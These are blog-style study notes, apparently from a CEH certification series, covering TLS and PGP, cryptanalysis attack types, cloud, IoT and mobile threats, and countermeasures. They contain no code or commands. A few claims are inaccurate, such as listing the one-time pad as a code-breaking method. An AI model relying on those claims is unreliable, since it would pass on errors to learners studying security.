  • Arbitrated Digital Signature: The Arbitrated Digital Signature includes three parties in which one is the sender, second is the receiver and the third is the arbiter who will become the medium for sending and receiving the message between them. The message are less prone to get corrupted because of timestamp being included by default.

Secure Sockets Layer

Secure Sockets Layer (SSL) is a standard security technology for establishing an encrypted link between a server and a client—typically a web server (website) and a browser, or a mail server and a mail client (e.g., Outlook).

SSL allows sensitive information such as credit card numbers, social security numbers, and login credentials to be transmitted securely. Normally, data sent between browsers and web servers is sent in plain text – leaving you vulnerable to eavesdropping. If an attacker is able to intercept all data being sent between a browser and a web server, they can see and use that information.

More specifically, SSL is a security protocol. Protocols describe how algorithms should be used. In this case, the SSL protocol determines variables of the encryption for both the link and the data being transmitted.

All browsers have the capability to interact with secured web servers using the SSL protocol. However, the browser and the server need what is called an SSL Certificate to be able to establish a secure connection.

SSL and TLS for Secure Communication

A popular implementation of public-key encryption is the Secure Sockets Layer (SSL). Originally developed by Netscape, SSL is an Internet security protocol used by Internet browsers and Web servers to transmit sensitive information. SSL has become part of an overall security protocol known as Transport Layer Security (TLS).

TLS and its predecessor SSL make significant use of certificate authorities. Once your browser requests a secure page and adds the “s” onto “http“, the browser sends out the public key and the certificate, checking three things:

  1. The certificate comes from a trusted party.
  2. The certificate is currently valid.
  3. The certificate has a relationship with the site from which it is coming.

The following are some important functionalities SSL/TLS has been designed for:

  • Server authentication to client and vice versa.
  • Select a common cryptographic algorithm.
  • Generate shared secrets between peers.
  • Protection of normal TCP/UDP connection.

How SSL/TLS works

These are the essential principles to grasp for understanding how SSL/TLS works:

  • Secure communication begins with a TLS handshake, in which the two communicating parties open a secure connection and exchange the public key.
  • During the TLS handshake, the two parties generate session keys, and the session keys encrypt and decrypt all communications after the TLS handshake.
  • Different session keys are used to encrypt communications in each new session.
  • TLS ensures that the party on the server-side, or the website the user is interacting with, is actually who they claim to be.
  • TLS also ensures that data has not been altered, since a message authentication code (MAC) is included with transmissions.

With TLS, both HTTP data that users send to a website (by clicking, filling out forms, etc.) and the HTTP data that websites send to users is encrypted. Encrypted data has to be decrypted by the recipient using a key.

TLS handshake

TLS communication sessions begin with a TLS handshake. A TLS handshake uses something called asymmetric encryption, meaning that two different keys are used on the two ends of the conversation. This is possible because of a technique called public-key cryptography.

In public-key cryptography, two keys are used: a public key, which the server makes available publicly, and a private key, which is kept secret and only used on the server-side. Data encrypted with the public key can only be decrypted with the private key and vice versa.

During the TLS handshake, the client and server use the public and private keys to exchange randomly generated data, and this random data is used to create new keys for encryption, called the session keys.

Pretty Good Privacy

Pretty Good Privacy (PGP) is a type of encryption program for online communication channels. The method was introduced in 1991 by Phil Zimmerman, a computer scientist and cryptographer. PGP offers authentication and privacy protection in files, emails, disk partitions and digital signatures and has been dubbed as the closest thing to military-grade encryption. PGP encrypts the contents of e-mail messages using a combination of different methods. PGP uses hashing, data compression, symmetric encryption, and asymmetric encryption. In addition to e-mail encryption, PGP also supports the use of a digital signature to verify the sender of an e-mail.

OpenPGP is the most widely applied standard when it comes to modern PGP practices. OpenPGP programs allow users to encrypt private and confidential messages before uploading or downloading content from a remote server. This prevents cybersecurity threats from the open channels of the Internet.

Disk Encryption

The disk encryption covers the encryption of disk to secure files and directories by converting them into an encrypted format. Disk encryption encrypts every bit on a disk to prevent unauthorised access to data storage.

The standard process for booting up an operating system is that the first section of the disk, called the master boot record, instructs the system where to read the first file that begins the instructions for loading the operating system.

When disk encryption is installed, the contents of the disk, except the master boot record and a small system that it loads, are encrypted using any suitable modern symmetric cypher by a secret key. The master boot record is modified to first load this small system, which can validate authentication information from the user.

Cryptography Attacks

Cryptographic attacks aim to recover the recover encryption keys. The process of finding vulnerabilities in code, encryption algorithms or key management schemes is called Cryptanalysis.

There are different attacks that can be applied in order to recover an encryption key:

  • Known-plaintext attacks: They are applied when cryptoanalyst have access to the plaintext message and its corresponding ciphertext and seeks to discover a correlation between them.
  • Cyphertext-only attacks: Cryptoanalysts only have access to the cyphertexts and they try to extract the plain text or the key by analysing the text and trying to extract the plain text. Frequency analysis, for example, is a great tool for this.
  • Chosen-plaintext attacks: A chosen-plaintext attack (CPA) is a model for cryptanalysis which assumes that the attacker can choose random plaintexts to be encrypted and obtain the corresponding ciphertexts. The goal of the attack is to gain some further information which reduces the security of the encryption scheme. In the worst case, a chosen-plaintext attack could expose secret information after calculating the secret key. Two forms of chosen-plaintext attack can be distinguished:
    • Batch chosen-plaintext attack, where the cryptanalyst chooses all plaintexts before any of them are encrypted. This is an unprofessional use of “chosen-plaintext attack”.
    • Adaptive chosen-plaintext attack, where the professional cryptanalyst makes a series of interactive queries, choosing subsequent plaintexts based on the information from the previous encryptions.
  • Chosen-cypher text attacks: A cryptanalyst can analyse any chosen ciphertexts together with their corresponding plaintexts. His goal is to acquire a secret key or to get as many information about the attacked system as possible.
  • Adaptive-chosen-ciphertext attacks: The adaptive-chosen-ciphertext attack is a kind of chosen-ciphertext attacks, during which an attacker can make the attacked system decrypt many different ciphertexts. This means that the new ciphertexts are created based on responses (plaintexts) received previously. The attacker can request decrypting of many ciphertexts.
  • Adaptive-chosen-plaintext attacks: An adaptive-chosen-plaintext attack is a chosen-plaintext attack scenario in which the attacker has the ability to make his or her choice of the inputs to the encryption function based on the previous chosen-plaintext queries and their corresponding ciphertexts.
  • Rubber hose attacks: The rubber hose attack is extracting secrets from people by use of torture or coercion. Other means is governmental and corporate influence over other sub-entities.

Code Breaking Methodologies

Some examples of methodologies that can help to break encryptions are:

  • Brute force
  • One-time pad
  • Frequency analysis
CEH (XXI): Cryptography

CEH (XX): Cloud Computing

The index of this series of articles can be found here.

Cloud computing has two meanings. The most common refers to running workloads remotely over the internet in a commercial provider’s data centre, also known as the “public cloud” model. Popular public cloud offerings such as Amazon Web Services (AWS), Google Cloud Platform (GCP) and Microsoft Azure, all exemplify this familiar notion of cloud computing. Today, most businesses take a multi-cloud approach, which simply means they use more than one public cloud service.

The second meaning of cloud computing describes how it works: a virtualized pool of resources from raw compute power to application functionality, available on demand. When customers procure cloud services, the provider fulfils those requests using advanced automation rather than manual provisioning. The key advantage is agility: the ability to apply abstracted compute, storage, and network resources to workloads as needed and tap into an abundance of pre-built services. Major characteristics of cloud computing include:

  • On-demand self-service
  • Distributed storage
  • Rapid elasticity
  • Measured services
  • Automated management
  • Virtualisation

Typed of Cloud Computing Services

The array of available cloud computing services is vast, but most fall into one of the following categories:

SaaS (Software as a Service)

This type of public cloud computing delivers applications over the internet through the browser. The most popular SaaS applications for business can be found in Google’s G Suite and Microsoft’s Office 365; among enterprise applications, Salesforce leads the pack. But virtually all enterprise applications, including ERP suites from Oracle and SAP, have adopted the SaaS model. Typically, SaaS applications offer extensive configuration options as well as development environments that enable customers to code their own modifications and additions.

IaaS (Infrastructure as a Service)

At a basic level, IaaS public cloud providers offer storage and compute services on a pay-per-use basis. But the full array of services offered by all major public cloud providers is staggering: highly scalable databases, virtual private networks, big data analytics, developer tools, machine learning, application monitoring, and so on. Amazon Web Services was the first IaaS provider and remains the leader, followed by Microsoft Azure, Google Cloud Platform, and IBM Cloud.

PaaS (Platform as a Service)

PaaS provides sets of services and workflows that specifically target developers, who can use shared tools, processes, and APIs to accelerate the development, testing, and deployment of applications. Salesforce’s Heroku and Force.com are popular public cloud PaaS offerings; Pivotal’s Cloud Foundry and Red Hat’s OpenShift can be deployed on-premises or accessed through the major public clouds. For enterprises, PaaS can ensure that developers have ready access to resources, follow certain processes, and use only a specific array of services, while operators maintain the underlying infrastructure.

FaaS (Functions as a Service)

FaaS, the cloud version of serverless computing, adds another layer of abstraction to PaaS so that developers are completely insulated from everything in the stack below their code. Instead of futzing with virtual servers, containers, and application runtimes, they upload narrowly functional blocks of code and set them to be triggered by a certain event (such as a form submission or uploaded file). All the major clouds offer FaaS on top of IaaS: AWS Lambda, Azure Functions, Google Cloud Functions, and IBM OpenWhisk. A special benefit of FaaS applications is that they consume no IaaS resources until an event occurs, reducing pay-per-use fees.

Cloud Deployment Models

Public Cloud

In a public cloud, individual businesses share on-premise and access to basic computer infrastructure (servers, storage, networks, development platforms etc.) provided by a CSP. Each company shares the CSP’s infrastructure with the other companies that have subscribed to the cloud. Payment is usually pay-as-you-go with no minimum time requirements. Some CSPs derive revenue from advertising and offer free public clouds.

Public clouds are usually based on massive hardware installations distributed in locations throughout the country or across the globe. Their size enables economies of scale that permit maximum scalability to meet requirements as a company’s needs expand or contract, maximum flexibility to meet surges in demand in real-time, and maximum reliability in case of hardware failures.

Public clouds are highly cost-effective because the business only pays for the computer resources it uses. In addition, the business has access to state-of-the-art computer infrastructure without having to purchase it and hire IT staff to install and maintain it.

The main disadvantage of public clouds is that advanced security and privacy provisions are beyond their capabilities. For example, public clouds cannot meet many regulatory compliance requirements because their tenants share the same computer infrastructure. In addition, large CSP’s often implement their public clouds on hardware installations located outside the United States which may be a concern for some businesses.

Public clouds are well suited for hosting development platforms or web browsers, for big data processing that places heavy demands on computer resources, and for companies that do not have advanced security concerns.

Private Cloud

In a private cloud, a business has access to infrastructure in the cloud that is not shared with anyone else. The business typically deploys its own platforms and software applications on the cloud infrastructure. The business’s infrastructure usually lies behind a firewall that is accessed through the company intranet over encrypted connections. Payment is often based on a fee-per-unit-time model.

Private clouds have the significant advantage of being able to provide enhanced levels of security and privacy because computer infrastructure is dedicated to a single client. Sarbanes Oxley, PCI and HIPAA compliance are all possible in a private cloud. In addition, private cloud CSPs are more likely to customize the cloud to meet a company’s needs.

An important disadvantage of private clouds for some companies is that the company is responsible for managing their own development platforms and software applications on the CSP’s infrastructure. While this gives the business substantial control on the software side, it comes at the cost of having to employ IT staff that can handle the company’s cloud deployment. Recognizing this disadvantage, some CSPs provide software applications and a virtual desktop within a company’s private cloud.

Private clouds have the additional disadvantages that they tend to be more expensive and the company is limited to using the infrastructure specified in their contract with the CSP.

Hybrid Cloud

In a hybrid cloud, a company’s cloud deployment is split between public and private cloud infrastructure. Sensitive data remains within the private cloud where high-security standards can be maintained. Operations that do not make use of sensitive data are carried out in the public cloud where infrastructure can scale to meet demands and costs are reduced.

Hybrid clouds are well suited to carrying out big data operations on non-sensitive data in the public cloud while keeping sensitive data protected in the private cloud. Hybrid clouds also give companies the option of running their public-facing applications or their capacity intensive development platforms in the public portion of the cloud while their sensitive data remains protected.

Community Cloud

Community clouds are a recent variation on the private cloud model that provide a complete cloud solution for specific business communities. Businesses share infrastructure provided by the CSP for software and development tools that are designed to meet community needs. In addition, each business has its own private cloud space that is built to meet the security, privacy and compliance needs that are common in the community.

Community clouds are an attractive option for companies in the health, financial or legal spheres that are subject to strict regulatory compliance. They are also well-suited to managing joint projects that benefit from sharing community-specific software applications or development platforms.

The recent development of community clouds illustrates how cloud computing is evolving. CSPs can combine different types of clouds with different service models to provide businesses with attractive cloud solutions that meet a company’s needs.

NIST Cloud Computing Reference Architecture

The NIST cloud computing reference architecture defines five major actors: cloud consumer, cloud provider, cloud carrier, cloud auditor and cloud broker. Each actor is an entity (a person or an organization) that participates in a transaction or process and/or performs tasks in cloud computing. This reference architecture is based on recommendations of the National Institute of Standards and Technology.

NIST Reference Model
ActorDefinition
Cloud ConsumerA person or organization that maintains a business relationship with, and uses service from, Cloud Providers.
Cloud ProviderA person, organization or entity responsible for making a service available to interested parties.
Cloud AuditorA party that can conduct an independent assessment of cloud services, information system operations, performance and security of the cloud implementation.
Cloud BrokerAn entity that manages the use, performance and delivery of cloud services, and negotiates relationships between Cloud Providers and Cloud Consumers.
Cloud CarrierAn intermediary that provides connectivity and transport of cloud services from Cloud Providers to Cloud Consumers.

The paper can be consulted here.

Cloud Computing Benefits

There are multiple benefits offered by cloud computing, some of them are:

  • Cost Savings: Cost saving is the biggest benefit of cloud computing. It helps organisations to save substantial capital cost as it does not need any physical hardware investments. Also, they do not need trained personnel to maintain the hardware. The buying and managing of equipment are done by the cloud service provider.
  • Security: A cloud host’s full-time job is to carefully monitor security, which is significantly more efficient than a conventional in-house system, where an organization must divide its efforts between a myriad of IT concerns, with security being only one of them.
  • Flexibility: By relying on an outside organization to take care of all IT hosting and infrastructure, organisations will have more time to devote toward the aspects of their business that directly affect their bottom line.
  • Mobility: Cloud computing allows mobile access to corporate data via smartphones and devices, which, considering over 2.6 billion smartphones are being used globally today, is a great way to ensure that no one is ever left out of the loop.
  • Quality Control: In a cloud-based system, all documents are stored in one place and in a single format. With everyone accessing the same information, you can maintain consistency in data, avoid human error, and have a clear record of any revisions or updates.
  • Disaster Recovery: Cloud-based services provide quick data recovery for all kinds of emergency scenarios, from natural disasters to power outages.
  • Loss Prevention: With a cloud-based server, all the information employees have uploaded to the cloud remains safe and easily accessible from any computer with an internet connection, even if the computer users regularly use is not working.
  • Automatic Software Updates: Cloud-based applications automatically refresh and update themselves, instead of forcing an IT department to perform a manual organization-wide update.

Virtualisation

Virtualisation creates a simulated or virtual, computing environment as opposed to a physical environment. Virtualisation often includes computer-generated versions of hardware, operating systems, storage devices and more. This allows organisations to partition a single physical computer or server into several virtual machines. Each virtual machine can then interact independently and run different operating systems or applications while sharing the resources of a single host machine.

By creating multiple resources from a single computer or server, virtualisation improves scalability and workloads while resulting in the use of fewer overall servers, less energy consumption and fewer infrastructure costs and maintenance. There are four main categories that virtualisation falls into. The first is desktop virtualisation, which allows one centralised server to deliver and manage individualised desktops. The second is network virtualisation, designed to split network bandwidth into independent channels to then be assigned to specific servers or devices. The third category is software virtualisation, which separates applications from the hardware and operating system. And the fourth is storage virtualisation, which combines multiple network storage resources into a single storage device which multiple users can access.

Key Properties of Virtual Machines

VMs have the following characteristics, which offer several benefits.

  • Partitioning: Allow to run multiple operating systems on one physical machine and to divide system resources between virtual machines.
  • Isolation: Provide fault and security isolation at the hardware level and preserve performance with advanced resource controls.
  • Encapsulation: Save the entire state of a virtual machine to files and move and copy virtual machines as easily as moving and copying files.
  • Hardware Independence: Provision or migrate any virtual machine to any physical server.

Types of Virtualization

  • Server Virtualization: Server virtualization enables multiple operating systems to run on a single physical server as highly efficient virtual machines.
  • Network Virtualization: By completely reproducing a physical network, network virtualization allows applications to run on a virtual network as if they were running on a physical network — but with greater operational benefits and all the hardware independencies of virtualization.
  • Desktop Virtualization; Deploying desktops as a managed service enables IT organizations to respond faster to changing workplace needs and emerging opportunities.

Virtualization vs. Cloud Computing

Although equally buzz-worthy technologies, virtualization and cloud computing are not interchangeable. Virtualization is software that makes computing environments independent of physical infrastructure, while cloud computing is a service that delivers shared computing resources (software and/or data) on-demand via the Internet. As complementary solutions, organizations can begin by virtualizing their servers and then moving to cloud computing for even greater agility and self-service.

Cloud Computing Threats

  • Data breaches
  • Weak identity, credential and access management
  • Insecure interfaces and APIs
  • System and application vulnerability
  • Account hijacking
  • Malicious insiders
  • Advanced persistent threats
  • Data loss
  • Insufficient due diligence
  • Abuse and nefarious use of cloud services
  • Denial of service
  • Shared technology issues

Cloud Computing Attacks

Cloud malware injection attacks

Malware injection attacks are done to take control of a user’s information in the cloud. For this purpose, hackers add an infected service implementation module to a SaaS or PaaS solution or a virtual machine instance to an IaaS solution. If the cloud system is successfully deceived, it will redirect the cloud user’s requests to the hacker’s module or instance, initiating the execution of malicious code. Then the attacker can begin their malicious activity such as manipulating or stealing data or eavesdropping.

The most common forms of malware injection attacks are cross-site scripting attacks and SQL injection attacks. During a cross-site scripting attack, hackers add malicious scripts (Flash, JavaScript, etc.) to a vulnerable web page. German researchers arranged an XSS attack against the Amazon Web Services cloud computing platform in 2011. In the case of SQL injection, attackers target SQL servers with vulnerable database applications. In 2008, Sony’s PlayStation website became the victim of a SQL injection attack.

Abuse of cloud services

Hackers can use cheap cloud services to arrange DoS and brute force attacks on target users, companies, and even other cloud providers. For instance, security experts Bryan and Anderson arranged a DoS attack by exploiting capacities of Amazon’s EC2 cloud infrastructure in 2010. As a result, they managed to make their client unavailable on the internet by spending only $6 to rent virtual services.

An example of a brute force attack was demonstrated by Thomas Roth at the 2011 Black Hat Technical Security Conference. By renting servers from cloud providers, hackers can use powerful cloud capacities to send thousands of possible passwords to a target user’s account.

Denial of service attacks

DoS attacks are designed to overload a system and make services unavailable to its users. These attacks are especially dangerous for cloud computing systems, as many users may suffer as the result of flooding even a single cloud server. In the case of high workload, cloud systems begin to provide more computational power by involving more virtual machines and service instances. While trying to prevent a cyberattack, the cloud system actually makes it more devastating. Finally, the cloud system slows down and legitimate users lose any availability to access their cloud services. In the cloud environment, DDoS attacks maybe even more dangerous if hackers use more zombie machines to attack a large number of systems.

Side-channel attacks

A side-channel attack is arranged by hackers when they place a malicious virtual machine on the same host as the target virtual machine. During a side-channel attack, hackers target system implementations of cryptographic algorithms. However, this type of threat can be avoided with secure system design.

Wrapping attacks

A wrapping attack is an example of a man-in-the-middle attack in the cloud environment. Cloud computing is vulnerable to wrapping attacks because cloud users typically connect to services via a web browser. An XML signature is used to protect users’ credentials from unauthorized access, but this signature does not secure the positions in the document. Thus, XML signature element wrapping allows attackers to manipulate an XML document.

For example, a vulnerability was found in the SOAP interface of Amazon Elastic Cloud Computing (EC2) in 2009. This weakness allowed attackers to modify an eavesdropped message as a result of a successful signature wrapping attack.

Man-in-the-cloud attacks

During this type of attack, hackers intercept and reconfigure cloud services by exploiting vulnerabilities in the synchronization token system so that during the next synchronization with the cloud, the synchronization token will be replaced with a new one that provides access to the attackers. Users may never know that their accounts have been hacked, as an attacker can put back the original synchronization tokens at any time. Moreover, there’s a risk that compromised accounts will never be recovered.

Insider attacks

An insider attack is initiated by a legitimate user who is purposefully violating the security policy. In a cloud environment, an attacker can be a cloud provider administrator or an employee of a client company with extensive privileges. To prevent the malicious activity of this type, cloud developers should design secure architectures with different levels of access to cloud services.

Account or service hijacking

Account or service hijacking is achieved after gaining access to a user’s credentials. There are various techniques for achieving this, from fishing to spyware to cookie poisoning. Once a cloud account has been hacked, attackers can obtain a user’s personal information or corporate data and compromise cloud computing services. For instance, an employee of Salesforce, a SaaS vendor, became the victim of a phishing scam which led to the exposure of all of the company’s client accounts in 2007.

Advanced persistent threats (APTs)

APTs are attacks that let hackers continuously steal sensitive data stored in the cloud or exploit cloud services without being noticed by legitimate users. The duration of these attacks allows hackers to adapt to security measures against them. Once unauthorized access is established, hackers can move through data centre networks and use network traffic for their malicious activity.

New attacks: Spectre and Meltdown

These two types of cyberattacks appeared earlier this year and have already become a new threat to cloud computing. With the help of malicious JavaScript code, adversaries can read encrypted data from memory by exploiting a design weakness in most modern processors. Both Spectre and Meltdown break the isolation between applications and the operating system, letting attackers read information from the kernel. This is a real headache for cloud developers, as not all cloud users install the latest security patches.

Cloud Security

Cloud computing security refers to the security implementations, deployment and preventions to defend against security threats.

Cloud Security Control Layers

  • Application layer: All the controls that can be added at application level including those that can be deployed together with an application like web applications firewalls and those included in the system development life cycle like code analysis, online secure transactions, script analysis, etc.
  • Information layer: At this layer, mechanisms to provide confidentiality and integrity are implemented together with different policies to monitor any data loss and content management. Prevention of data leakages and enforcement of compliance with rules and regulations.
  • Management layer: Governance, risk management, compliance, identity and access management and, patch and configuration management help to control the secure access to the organisation resource and to manage them.
  • Network layer: Anything that can be applied to the network level like IDS/IPs, firewalls and other tools already discussed in previous chapters to secure networks.
  • Trust computing: The Root of Trust (RoT) is established by validating each component of hardware and software from the end entity up to the root certificate. It is intended to ensure that only trusted software and hardware can be used while still retaining flexibility.
  • Computer and storage: Integrity checks, file system monitoring, log file analysis, connection analysis, encryption, etc are solutions normally deployed for the protection of resources.
  • Physical security: Prevention and protection of physical damage, stealing, unauthorised physical access and environmental disaster are things to consider when securing resources.

Responsibilities in Cloud Security

Cloud Service Provider

Responsibilities of a cloud service provider include:

  • Web applications firewalls (WAF)
  • Real traffic grabber (RGT)
  • Firewall
  • Intrusion prevention systems
  • Secure web gateway (SWG)
  • Application security (App Sec)
  • Virtual private networks (VPN)
  • CoS/QoS
  • Trusted platform module
  • Netflow and others

Cloud Service Consumer

Responsibilities of a cloud service consumer include:

  • Public key infrastructure (PKI)
  • Security development life cycle (SDLC)
  • Web application firewall (WAF)
  • Firewall
  • Encryption
  • Intrusion prevention system
  • Secure web gateway
  • Application security
  • Virtual private networks and others

Cloud Computing Security Considerations

  • Software configuration management
  • Disaster recovery plan
  • Strong key generation
  • Patching and updates
  • AICPA SAS 70 type audits
  • Data integrity
  • Load balancing
  • Backup
  • VPN
  • SSL
  • Cryptography implementation
  • Strong AAA mechanism
  • Reliability
  • Quality of service (QoS)
  • Prohibit credential sharing
  • Monitoring activities
  • Higher multi-tenancy
  • Service level agreement (SLA)
  • Supply chain management
CEH (XX): Cloud Computing

CEH (XIX): IoT Hacking

The index of this series of articles can be found here.

IoT is the concept of basically connecting any device with an on and off switch to the Internet (and/or to each other). This includes everything from cellphones, coffee makers, washing machines, headphones, lamps, wearable devices and almost anything else you can think of. This also applies to components of machines, for example, a jet engine of an aeroplane or the drill of an oil rig. As I mentioned, if it has an on and off switch then chances are it can be a part of the IoT.

On a broader scale, the IoT can be applied to things like transportation networks: “smart cities” which can help us reduce waste and improve efficiency for things such as energy use; this helping us understand and improve how we work and live. Take a look at the visual below to see what something like that can look like.

The architecture of IoT depends upon five layers which are:

  • Application layer: Layer responsible for delivering the data to the users at the application layer. This is the user interface to control, manage and command IoT devices.
  • Middleware layer: It is for device and information management.
  • Internet layer: It is responsible for end-points connectivity.
  • Access gateway layer: It is responsible for protocol transmission and messaging.
  • Edge technology layer: It covers IoT capable devices.

IoT Communication Models

There are several ways in which IoT devices can communicate. The following are some of these models:

  • Device-to-Device Model: It is a basic model where two devices talk to each other without interfering any other device. Communication is established using some kind of wireless connection. Wi-Fi, Bluetooth, NFC or RFID can be examples of this model.
  • Device-to-Cloud Model: In this model, IoT devices communicate to each other communicating through an application server. For example, manufacturing environments where a usually big amount of sensors send information to a server. Application servers process the data and perform automated actions based on that analysis.
  • Device-to-Gateway Model: Similar to the Device-to-Cloud model, and IoT device gateway is added. The function of this gateway is to collect the data from the devices and, send it to a remote application server. In addition, offers a consolidated point where checks that the data is flowing can be done. Plus, it can provide security and protocol translation functionalities.
  • Back-End Data-sharing Model: This model extends the Device-to-Cloud model in a scalable scenario where multiple parties can access and control IoT devices and sensors. In this model, IoT devices communicate with an application server too.

Understanding IoT Attacks

In addition to the traditional attacks ones, other major challenges can be found in IoT environments:

  • Lack of security
  • Vulnerable interfaces
  • Physical security risk
  • Lack of vendor support
  • Difficulties to update firmware and OS
  • Interoperability issues

The last version of the OWASP IoT Top 10 define the next vulnerabilities:

  • Weak, Guessable, or Hardcoded Password: Use of easily brute-forced, publicly available, or unchangeable credentials, including backdoors in firmware or client software that grants unauthorized access to deployed systems.
  • Insecure Network Services: Unneeded or insecure network services running on the device itself, especially those exposed to the internet, that compromise the confidentiality, integrity/authenticity, or availability of information or allow unauthorized remote control.
  • Insecure Ecosystem Interfaces: Insecure web, backend API, cloud, or mobile interfaces in the ecosystem outside of the device that allows compromise of the device or its related components. Common issues include a lack of authentication/authorization, lacking or weak encryption, and a lack of input and output filtering.
  • Lack of Secure Update Mechanism: Lack of ability to securely update the device. This includes lack of firmware validation on devices, lack of secure delivery (un-encrypted in transit), lack of anti-rollback mechanisms, and lack of notifications of security changes due to updates.
  • Use of Insecure or Outdated Components: Use of deprecated or insecure software components/libraries that could allow the device to be compromised. This includes insecure customization of operating system platforms and the use of third-party software or hardware components from a compromised supply chain.
  • Insufficient Privacy Protection: User’s personal information stored on the device or in the ecosystem that is used insecurely, improperly, or without permission.
  • Insecure Data Transfer and Storage: Lack of encryption or access control of sensitive data anywhere within the ecosystem, including at rest, in transit, or during processing.
  • Lack of Device Management: Lack of security support on devices deployed in production, including asset management, update management, secure decommissioning, systems monitoring, and response capabilities.
  • Insecure Default Settings: Devices or systems shipped with insecure default settings or lack the ability to make the system more secure by restricting operators from modifying configurations.
  • Lack of Physical Hardening: Lack of physical hardening measures, allowing potential attackers to gain sensitive information that can help in a future remote attack or take local control of the device.

IoT Attack Areas

The following are the most common attack areas for IoT networks:

  • Device memory containing credentials
  • Access control
  • Firmware extraction
  • Privileges escalation
  • Resetting to an insecure state
  • Removal of storage media
  • Web attack
  • Firmware attacks
  • Network services attacks
  • Unencrypted local data storage
  • Confidentiality and integrity issues
  • Cloud computing attacks
  • Malicious updates
  • Insecure APIs
  • Mobile application threats

IoT Attacks

  • DDoS attacks: Using this technique all the services associated with an IoT network can be targeted, devices, gateways and application servers.
  • Rolling code attacks: Rolling code or code hooping is another technique where attacker capture the code, sequence or signal coming from transmitter devices and simultaneously block the receivers. The code will be used later to gain unauthorised access. For example, the opening signal of a car that can be recorded and reproduce it later.
  • BlueBorne attacks: It is the use of different techniques to exploit Bluetooth vulnerabilities to gain unauthorised access.
  • Jamming jack: Jamming a signal to prevent devices communication.
  • Backdoor: Deploying a backdoor on a computer of an employee or victim to gain access to the IoT network. Tricks do not always need to apply to de IoT devices.

Other general attacks are:

  • Eavesdropping
  • Sybil attack
  • Exploit kits
  • MitM attacks
  • Replay attacks
  • Forged malicious devices
  • Side-channel attack
  • Ransomware attack

IoT Hacking Methodology

The methodology applied on IoT platforms is the same than the one is applied to other platforms.

  • Information gathering: IP addresses, running protocols, open ports, type of devices, vendor’s information, etc. Shodan, Censys and Thingful are search engines to find information about IoT devices. Shodan is a great tool for discovering and gathering information from IoT devices deployed around the world.
  • Vulnerability scanner: Scanning network and devices looking for vulnerabilities, weak passwords, software and firmware bugs, default configurations, etc. Nmap and others are very helpful tools.
  • Launch attack: Exploiting the vulnerabilities using different attacks like DDoS, Rolling code, jamming, etc. RFCrack, Attify Zigbee and HackRF One are popular tools for hacking.
  • Gain access: Taking control over an IoT environment. Gaining access, escalating privileges, and backdoor installation are included in this phase among others.
  • Maintain attack: Includes login out without being detected, clearing logs and covering tracks.

Countermeasures

Countermeasures include:

  • Firmware updates
  • Block unnecessary ports
  • Disable telnet
  • Use encryption communication such as SSL/TLS
  • Use strong passwords
  • Use encryption in drivers
  • User account lockout
  • Periodic assessment of devices
  • Secure password recovery
  • Two-factor authentication
  • Disable UPnP
CEH (XIX): IoT Hacking

CEH (XVIII): Hacking Mobile Platforms

The index of this series of articles can be found here.

Mobile phones, they are nowadays everywhere. They are used for entertainment, work, personal finances and services, almost anything we can imagine. In addition, there are a in the market a big variety of systems running on these mobile devices such as iOS, Blackberry OS, Android, Symbian, Windows, etc.

For all these reasons, these mobile devices must have strong security and not just a feeling of been secure to protect their users and all the private information they store. Plus, with the Bring Your Own Device philosophy, devices can cause multiple problems in corporate environments and networks.

Mobile Platform Attack Vectors

The OWASP project publishes an unbiased and practical list of the top 10 most common attacks on mobile platforms:

Top 10 (2016)Top 10 (2014)
Improper Platform UsageWeak Server Side Controls
Insecure Data StorageInsecure Data Storage
Insecure CommunicationInsufficient Transport Layer Protection
Insecure AuthenticationUnintended Data Leakage
Insufficient CryptographyPoor Authorization and Authentication
Insecure AuthorizationBroken Cryptography
Client Code QualityClient-Side Injection
Code TamperingSecurity Decisions Via Untrusted Inputs
Reverse EngineeringImproper Session Handling
Extraneous FunctionalityLack of Binary Protections

More information can be found at the project’s page OWASP Mobile Top 10.

Mobile Attack Vector

There are several threads and attacks on mobile devices. Some of the most basics examples are malware, data loss, integrity attacks, social engineering attacks, etc. Mobile attack vectors include:

  • Malware
  • Data loss
  • Data Tampering
  • Data Exfiltration

Vulnerabilities and Risks on Mobile Platforms

Some of the risks for mobile platforms are:

  • Malicious third-party applications
  • Malicious applications on Store
  • Malware and rootkits
  • Application vulnerabilities
  • Data security
  • Excessive permissions
  • Weak encryption
  • Operative system update issues
  • Application updates issues
  • Jailbreak and rooting
  • Physical attacks

Application Sandbox Issue

Application sandboxing, also called application containerization, is an approach to software development and mobile application management (MAM) that limits the environments in which certain code can execute.

The goal of sandboxing is to improve security by isolating an application to prevent outside malware, intruders, system resources or other applications from interacting with the protected app. The term sandboxing comes from the idea of a child’s sandbox, in which the sand and toys are kept inside a small container or walled area.

Application sandboxing is controversial because its complexity can cause more security problems than the sandbox was originally designed to prevent. The sandbox has to contain all the files the application needs to execute, which can also create problems between applications that need to interact with one another. Still, it is one of the best security methods to be used when developing for mobile devices.

However, advance malicious applications can be designed to bypass the sandbox technology. Fragmented codes and sleep timers are common techniques adopted by attackers to bypass the inspection process.

Mobile Spam and Phishing

Mobile devices and technologies are just another path attackers can choose to send emails or messages spamming users or trying to convince them to click and access malicious links searching for credentials or information.

Open Wi-Fi and Bluetooth Networks

Public or unencrypted Wi-Fi or Bluetooth networks are another easy way for attackers to intercept communications and reveal information.

Hacking Android OS

Android is an operating system developed by Google for smartphones. But, it is not only present in smartphones, but it can also be found in other devices like gaming consoles, PCs and IoT devices. Android OS brings flexible features with an open-source platform.

Android OS has very wide support for and integration with different hardware and services what is one of its major features, and receives periodically updates.

One of the most successful features is also one of the major security flows for Android devices been this the flexibility to install third-party apps not just from trusted stores by applications (APKs) from other sources of the Internet.

Device Administration API

In version 2.2 of the Android SO the Device Administration API was introduced to ensure the administration of the device at the system level and offering control over Android devices within a corporate network. Using this security-aware API, administrators can perform several actions including wiping the device remotely or manage installed applications.

Root Access / Android Rooting

Rooting is basically the process of gaining privileged control over a device, commonly known as Root access. As in one other Linux kernel-based system, root access gives superuser permissions. These permissions allow to modify the system settings and configurations and overcome limitations and restrictions. The rooting process can be used for malicious intentions such as the installation of malicious applications, analysing custom firmware of given unnecessary permission to applications.

Android stack

Android Phone Security Tools

There are multiple Android security tools that can be found in the stores but, when installing them, users need to keep in mind and be sure of their authenticity and that the companies or developers behind them are legitimate.

Hacking iOS

iOS is the operative system developed by Apple for their iPhones and nowadays it can be found in other devices of the company like iPads and iPods. Together with Android, they are the two most popular operative systems for mobile devices.

Major versions of the operative system tend to be released yearly. Two of the major security improvements iOS brings to the table are hardware-accelerated encryption and application isolation where one application cannot access another application’s data.

